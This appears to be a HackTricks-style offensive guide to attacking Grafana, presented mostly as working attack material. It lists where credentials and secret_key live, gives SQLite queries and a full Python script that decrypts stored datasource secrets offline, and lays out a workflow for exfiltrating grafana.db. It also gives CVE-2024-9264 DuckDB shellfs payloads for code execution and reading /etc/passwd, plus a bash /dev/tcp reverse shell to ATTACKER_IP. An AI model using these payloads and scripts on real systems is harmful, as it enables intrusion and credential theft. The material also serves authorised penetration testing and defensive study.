Grafana

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Interesting things

  • Main config is usually /etc/grafana/grafana.ini (Deb/RPM) and can contain sensitive values such as admin_user, admin_password, secret_key, OAuth client secrets, SMTP credentials, and renderer tokens. In containers and Kubernetes the same keys are often supplied as GF_<SECTION>_<KEY> environment variables (for example GF_SECURITY_SECRET_KEY or GF_SECURITY_ADMIN_PASSWORD), so dump the process environment as well.
  • By default Grafana stores its data in SQLite3 under /var/lib/grafana/grafana.db; if the [database] section of grafana.ini points at MySQL/Postgres instead, the database credentials are right there too.
  • Provisioning files are very interesting once you have access to the host:
    • /etc/grafana/provisioning/datasources/*.yaml
    • /etc/grafana/provisioning/plugins/*.yaml
  • Provisioning files support environment-variable expansion ($VAR / ${VAR}), so a leaked YAML either contains the literal secret or tells you the name of the env var that holds it, which points you at the process environment, the unit file, or the container spec.
  • Installed plugins usually live under /var/lib/grafana/plugins.
  • Inside the platform you can, depending on your role, invite users, create API keys / service account tokens, list plugins, or install new plugins.
  • The browser is a trove too: Grafana ships the non-secret datasource config to the frontend. With a Viewer session (or anonymous access enabled), inspect window.grafanaBootData.settings.datasources from DevTools.

Useful SQLite checks (sqlite3 /var/lib/grafana/grafana.db; work on a copy so you don't fight the service for the lock):

.tables
.schema data_source
SELECT id,org_id,name,type,url,access,is_default,json_data,secure_json_data FROM data_source;
SELECT id,org_id,uid,login,email,is_admin FROM user;
SELECT id,org_id,uid,title,slug FROM dashboard;

Stealing datasources and secrets

Grafana separates configuration the browser is allowed to see from secrets it keeps server-side:

  • jsonData is visible to users in the browser and is usually enough to enumerate internal hosts, tenants, auth modes, header names, AWS regions, Elasticsearch indexes, Loki tenants, Prometheus URLs, and similar recon data.
  • secureJsonData is encrypted server-side and can no longer be read from the browser once the datasource has been saved; the API only reports which keys are set (secureJsonFields).

Post-exploitation workflow:

  1. Grab a copy of grafana.ini (or the GF_SECURITY_SECRET_KEY env var) and recover secret_key. If nobody changed it, it is still the well-known default SW2YcwTIb9zpOOhoPsMm that ships in grafana.ini.
  2. Exfiltrate grafana.db and the provisioning files.
  3. Enumerate datasources and plugin config looking for reusable credentials and internal endpoints.
  4. If you migrate or replay the database on another Grafana instance, reuse the same secret_key; otherwise the stored datasource passwords/tokens will not decrypt.

Why secret_key matters in newer versions:

  • Since Grafana v9, database secrets use envelope encryption.
  • Grafana encrypts each secret with a data encryption key (DEK); the DEKs themselves live in the data_keys table, encrypted with a key encryption key (KEK) derived from secret_key (or held by an external KMS provider if one is configured under [security.encryption]).
  • From an attacker's point of view, grafana.db + secret_key is the pair worth stealing: with both, every secureJsonData value can be decrypted offline.
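The script below is an added example (not Grafana's code and not from the original page) that ties the SQLite checks above to the secret_key discussion: it reads data_source.secure_json_data and data_keys.encrypted_data straight out of grafana.db and decrypts them with secret_key, handling both the pre-v9 layout (values encrypted directly under secret_key) and the envelope layout (a #keyId# prefix pointing at a DEK in data_keys). The blob layouts, the data_keys column names and the aes-gcm variant are the example author's reading of the format and must be treated as assumptions to verify against the target version; the demo database it builds is constructed sample data. It needs the cryptography package.

```python
"""Recover Grafana datasource secrets offline from grafana.db + secret_key.
Added example, not Grafana's code; layouts below are the example author's reading
of the format (ASSUMPTIONS, verify against the target version):
  legacy blob : [*<base64 algo>*] <salt 8B> <iv 16B | nonce 12B> <ciphertext>
  envelope    : #<base64 keyId># <legacy blob encrypted with the DEK>
  DEK         : data_keys.encrypted_data, itself a legacy blob under secret_key
Key for each legacy blob: PBKDF2-HMAC-SHA256(secret, salt, 10000 iterations, 32 bytes).
Needs the `cryptography` package for AES."""
import base64, hashlib, json, os, sqlite3, sys

SALT_LEN, IV_LEN, NONCE_LEN, PBKDF2_ITERS = 8, 16, 12, 10_000
AES_CFB, AES_GCM = "aes-cfb", "aes-gcm"

def _b64raw_decode(s: bytes) -> bytes:
    # prefixes use unpadded base64; urlsafe_b64decode accepts both alphabets
    return base64.urlsafe_b64decode(s + b"=" * (-len(s) % 4))

def derive_key(secret: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", secret, salt, PBKDF2_ITERS, dklen=32)

def split_envelope(blob: bytes):
    """'#<keyId>#payload' -> (keyId, payload); no prefix -> (None, blob)."""
    if blob[:1] == b"#":
        end = blob.index(b"#", 1)
        return _b64raw_decode(blob[1:end]).decode(), blob[end + 1:]
    return None, blob

def split_algorithm(blob: bytes):
    """'*<algo>*body' -> (algo, body); no prefix means AES-CFB."""
    if blob[:1] == b"*":
        end = blob.index(b"*", 1)
        return _b64raw_decode(blob[1:end]).decode(), blob[end + 1:]
    return AES_CFB, blob

def decrypt_legacy(blob: bytes, secret: bytes) -> bytes:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    algo, body = split_algorithm(blob)
    key, rest = derive_key(secret, body[:SALT_LEN]), body[SALT_LEN:]
    if algo == AES_CFB:  # full-block CFB, no padding, no integrity check
        dec = Cipher(algorithms.AES(key), modes.CFB(rest[:IV_LEN])).decryptor()
        return dec.update(rest[IV_LEN:]) + dec.finalize()
    if algo == AES_GCM:  # assumed layout: salt || 12-byte nonce || ct+tag, no AAD
        return AESGCM(key).decrypt(rest[:NONCE_LEN], rest[NONCE_LEN:], None)
    raise ValueError(f"unsupported algorithm {algo!r}")

def encrypt_legacy(plaintext: bytes, secret: bytes) -> bytes:
    """AES-CFB writer: builds the demo data and re-keys secrets for a migrated database."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    salt, iv = os.urandom(SALT_LEN), os.urandom(IV_LEN)
    enc = Cipher(algorithms.AES(derive_key(secret, salt)), modes.CFB(iv)).encryptor()
    return salt + iv + enc.update(plaintext) + enc.finalize()

def decrypt_value(blob: bytes, secret_key: str, data_keys: dict) -> bytes:
    """Envelope-aware decrypt: unwrap the DEK with secret_key, then the payload with the DEK."""
    key_id, payload = split_envelope(blob)
    if key_id is None:  # pre-envelope value, encrypted directly under secret_key
        return decrypt_legacy(payload, secret_key.encode())
    dek = decrypt_legacy(data_keys[key_id], secret_key.encode())
    return decrypt_legacy(payload, dek)  # the raw DEK bytes act as the PBKDF2 "secret"

def load_data_keys(conn) -> dict:
    try:  # the table only exists once envelope encryption has been used
        return {n: bytes(e) for n, e in conn.execute("SELECT name, encrypted_data FROM data_keys")}
    except sqlite3.OperationalError:
        return {}

def dump_datasources(conn, secret_key: str) -> list:
    """[{id, name, type, url, secrets: {field: plaintext}}] for every data_source row."""
    data_keys, rows = load_data_keys(conn), []
    for ds_id, name, ds_type, url, sjd in conn.execute(
            "SELECT id, name, type, url, secure_json_data FROM data_source"):
        secrets = {}
        for field, b64 in json.loads(sjd or "{}").items():  # values: std-base64 ciphertext
            try:
                plain = decrypt_value(base64.b64decode(b64), secret_key, data_keys)
                secrets[field] = plain.decode("utf-8", "replace")
            except Exception as exc:  # unknown key id, bad blob, gcm auth failure, no AES lib
                secrets[field] = f"<decrypt failed: {exc}>"
        rows.append({"id": ds_id, "name": name, "type": ds_type, "url": url, "secrets": secrets})
    return rows

def make_demo_db(secret_key: str) -> sqlite3.Connection:
    """Constructed in-memory grafana.db: one legacy and one envelope-encrypted secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data_keys(name TEXT PRIMARY KEY, encrypted_data BLOB)")
    conn.execute("CREATE TABLE data_source(id INT, name TEXT, type TEXT, url TEXT, secure_json_data TEXT)")
    dek = os.urandom(16)
    conn.execute("INSERT INTO data_keys VALUES (?,?)", ("key1", encrypt_legacy(dek, secret_key.encode())))
    legacy = encrypt_legacy(b"pr0m-pass", secret_key.encode())
    wrapped = b"#" + base64.b64encode(b"key1").rstrip(b"=") + b"#" + encrypt_legacy(b"AKIA-demo-token", dek)
    for row in ((1, "prom", "prometheus", "http://prom.internal:9090", {"basicAuthPassword": legacy}),
                (2, "cw", "cloudwatch", "", {"secretKey": wrapped})):
        sjd = json.dumps({k: base64.b64encode(v).decode() for k, v in row[4].items()})
        conn.execute("INSERT INTO data_source VALUES (?,?,?,?,?)", row[:4] + (sjd,))
    return conn

if __name__ == "__main__":  # python3 grafana_secrets.py /var/lib/grafana/grafana.db '<secret_key>'
    for ds in dump_datasources(sqlite3.connect(sys.argv[1]), sys.argv[2]):
        print(json.dumps(ds, indent=2))
```

Feed it the secret_key line from grafana.ini (or the GF_SECURITY_SECRET_KEY value from the process environment). Two caveats a practitioner should keep in mind: AES-CFB carries no integrity check, so a wrong secret_key yields garbage rather than an error, whereas aes-gcm values fail authentication; and encrypt_legacy is what you need when you move secrets to an instance that has a different secret_key instead of copying the key along with the database.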

Plugin attack surface

Treat plugins as part of the target, not an extra hint:

  • Enumerate them from the filesystem, from the UI, or from the API (any authenticated session works, or anonymous if enabled):
curl -s -u USER:PASS http://grafana.target/api/plugins | jq '.[].id'
  • Older or third-party plugins regularly extend Grafana's reach into internal networks because they proxy HTTP requests or interact with local files/databases.
  • Recent examples include SSRF in the Infinity plugin (< 3.4.1) and abuse paths where the Image Renderer plugin turns another bug into full-read SSRF.

CVE-2024-9264 – SQL Expressions (DuckDB shellfs) post-auth RCE / LFI

Grafana’s experimental SQL Expressions feature can evaluate DuckDB queries that embed user-controlled text. Insufficient sanitization allows attackers to chain DuckDB statements and load the community extension shellfs, which exposes shell commands via pipe-backed virtual files.

Impact

  • Any authenticated user with VIEWER or higher can get code execution as the Grafana OS user (often grafana; sometimes root inside a container) or perform local file reads.
  • Preconditions commonly met in real deployments:
    • SQL Expressions enabled: expressions.enabled = true in grafana.ini; in the affected releases the SQL engine itself is also gated behind the experimental sqlExpressions feature toggle, so check [feature_toggles] as well
    • duckdb binary present in the PATH of the Grafana server process (Grafana executes the DuckDB CLI; a binary that only your own shell can find does not count)

Quick checks

  • Version: GET /api/health answers without authentication and includes the Grafana version, so you can triage before logging in.
  • With a server-admin account, read the effective settings (Swagger: /swagger-ui, endpoint /api/admin/settings; both require server admin) to confirm:
    • expressions.enabled is true
    • Optional: datasource types and general hardening settings
  • Shell on host: which duckdb must resolve (in the Grafana process's PATH) for the exploit path below.

Manual query pattern using DuckDB + shellfs

  • Abuse flow (2 queries):
  1. Install and load the shellfs extension, run a command, redirect combined output to a temp file via pipe
  2. Read back the temp file using read_blob

Example SQL Expressions payloads that get passed to DuckDB:

-- 1) Prepare shellfs and run command
SELECT 1; INSTALL shellfs FROM community; LOAD shellfs;
SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |');
-- 2) Read the output back
SELECT content FROM read_blob('/tmp/grafana_cmd_output');

Replace CMD with the command you want. For a file read (LFI) you can instead use DuckDB's file functions directly, e.g. SELECT content FROM read_blob('/etc/passwd'), with no shellfs involved.

One-line reverse shell example

bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"

Use that as CMD in the first query with a listener waiting: nc -lnvp 443. Port 443 is picked because it is the outbound port most likely to be allowed from a monitoring host.

Automated PoC

Example usage

# Confirm execution context and UID
python3 CVE-2024-9264.py -u <USER> -p <PASS> -c id http://grafana.target
# Launch a reverse shell
python3 CVE-2024-9264.py -u <USER> -p <PASS> \
-c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' \
http://grafana.target

If the output shows uid=0(root), Grafana is running as root (common inside some containers).

2025 client-side traversal / open redirect chain

The 2025 Grafana client-side path traversal and open-redirect chain is documented on the generic client-side pages. Apply those techniques to Grafana-specific paths such as plugin assets, dashboard script loaders, and token-rotation redirects:

Client Side Path Traversal

Open Redirect
